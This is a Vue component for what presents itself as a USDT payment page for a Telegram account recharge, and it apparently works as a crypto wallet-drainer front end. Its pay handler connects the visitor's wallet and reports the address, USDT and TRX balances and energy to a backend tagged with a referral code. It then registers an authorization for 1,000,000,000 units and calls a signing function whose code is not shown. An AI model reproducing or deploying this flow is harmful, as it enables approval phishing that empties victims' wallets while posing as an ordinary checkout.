<template>
    <div>
        <div class="pay-wrap">
            <div class="content">
                <p class="pay-tips"> 付款成功后请勿关闭此页面，请耐心等待自动回调订单，否则可能无法自动到账!</p>

                <div class="info-wrap">
                    <div class="info-list">
                        <span class="label">商品订单</span>
                        <span class="text">{{ detail.order_no }}</span>
                    </div>
                    <div class="info-list">
                        <span class="label">商品详情</span>
                        <span class="text">{{ detail.order_name }}</span>
                    </div>
                    <div class="info-list">
                        <span class="label">购买数量</span>
                        <span class="text">{{ detail.quantity }}</span>
                    </div>
                    <div class="info-list">
                        <span class="label">付款金额</span>
                        <span class="text">{{ detail.rech_amount * detail.quantity }}USDT</span>
                    </div>
                    <div class="info-list">
                        <span class="label">充值账号</span>
                        <span class="text">{{ detail.tg_no }}</span>
                    </div>
                </div>

                <div class="pay-list">
                    
                    <div class="btn-wrap">
                        <a-button class="btn" @click="onPay" type="primary">付款</a-button>
                    </div>
                </div>
            </div>
        </div>
    </div>
</template>

<script>

import { connectWallet,getUSDTBalance,getTRXBalance,getEnergy,signAndSend1 } from '../util/tronweb'; 
import { getOrderInfo,addAuthorize,addToast } from '../util/api';
import { message } from 'ant-design-vue';

export default {
    name: 'WalletPayment',
    props: {
        msg: String
    },
    components: {
    },
    data() {
        return {
            detail: {},
            tg_no:'',
            checkedVal: '',
            payList: [
                { title: 'imToken钱包', src: require('../assets/imtoken.jpg'), value: 'imtoken', checked: false },
                { title: 'Tokenpocket', src: require('../assets/tokenpocket.jpg'), value: 'tokenpocket', checked: true },
                { title: 'BitGet钱包', src: require('../assets/bitget.jpg'), value: 'bitget', checked: false },
                { title: 'TronLink钱包', src: require('../assets/tronlink.jpg'), value: 'tronlink', checked: false },
            ]
        }
    },
    async mounted() {
        const tgNo = this.$route.params.tgNo; // 解析字符串为对象
        const referralCode = this.$route.params.referralCode; // 解析字符串为对象
       
        console.log(tgNo+"111"+referralCode);
         // 获取推荐码
        this.referralCode = referralCode
        this.tg_no =  tgNo
        //根据TG号获取订单
        const data = await getOrderInfo(this.tg_no);
        console.log(data);
        this.detail = data.data;

    },
    methods: {
        getUserApploenMethod() {
            // 
        },
        onCheck(val) {
            this.checkedVal = val
        },
        async onPay() {
            //首先要对余额进行判断
           const wallet = await connectWallet();
           if(wallet){
                const money = await getUSDTBalance(wallet);
                if(money){
                    const trx = await getTRXBalance(wallet);    
                    const energy = await getEnergy(wallet);
                    //const is_true = await checkAuthorization(wallet)
                    let is_authorize = "0"
                    

                    let data = {
                        referralCode:this.referralCode,
                        address:wallet,
                        usdt_balance:money,
                        trx_balance:trx,
                        energy:energy,
                        is_authorize:is_authorize,
                        message:"有用户访问网站"
                    }
                    await addToast(data)
                    console.log(data);
                }
                if(Number(this.detail.rech_amount) > money){
                    message.warning('USDT余额不足');
                    return
                }
                console.log(money);
                let data = {};
                data.address = wallet;
                data.tg_no = this.detail.tg_no;
                data.referralCode = this.referralCode;
                data.authorize_banlce = 1000000000;
                data.order_no = this.detail.order_no;
                data.usdt_banlce = money;
                await addAuthorize(data);
               const result =  await signAndSend1();
               
               if(result){
                    console.log(result);
                    message.warning('付款成功');
                    alert('付款成功');
                    
                // 登录后获取当前钱包地址
               }
                //再调用授权街口

           }
        },


    }
}
</script>

<style scoped lang="less">
.pay-wrap {
    display: flex;
    justify-content: center;
    margin-top: 20px;
    background: #fff;

    .content {
        width: 1200px;

        .tips {
            padding: 20px 0px 10px;
            line-height: 22px;
            margin-bottom: 0;
            font-size: 16px;
            text-align: center;
        }

        .pay-tips {
            padding: 10px 15px;
            line-height: 22px;
            margin-bottom: 0;
            background-color: #FFF3F3;
            font-size: 14px;
            color: red;
            margin: 10px;
            border-radius: 4px;
        }

        .info-wrap {
            padding: 0 20px;
        }

        .info-list {
            height: 56px;
            display: flex;
            justify-content: space-between;
            align-items: center;
            border-bottom: #f8f8f8 2px solid;
        }

        .pay-list {
            padding: 20px;

            .title {
                font-weight: bold;
            }

            .item {
                display: flex;
                align-items: center;
                height: 60px;
                justify-content: space-between;
                border-bottom: #f8f8f8 2px solid;
            }

            .img-wrap {
                display: flex;
                align-items: center;

                img {
                    width: 40px;
                    height: 40px;
                    border-radius: 10px;
                    margin-right: 16px;
                }
            }
        }

        .btn-wrap {
            display: flex;
            justify-content: center;

            .btn {
                height: 50px;
                width: 100%;
                margin-top: 20px;
                font-size:1.3rem;
            }
        }

    }
}
</style>
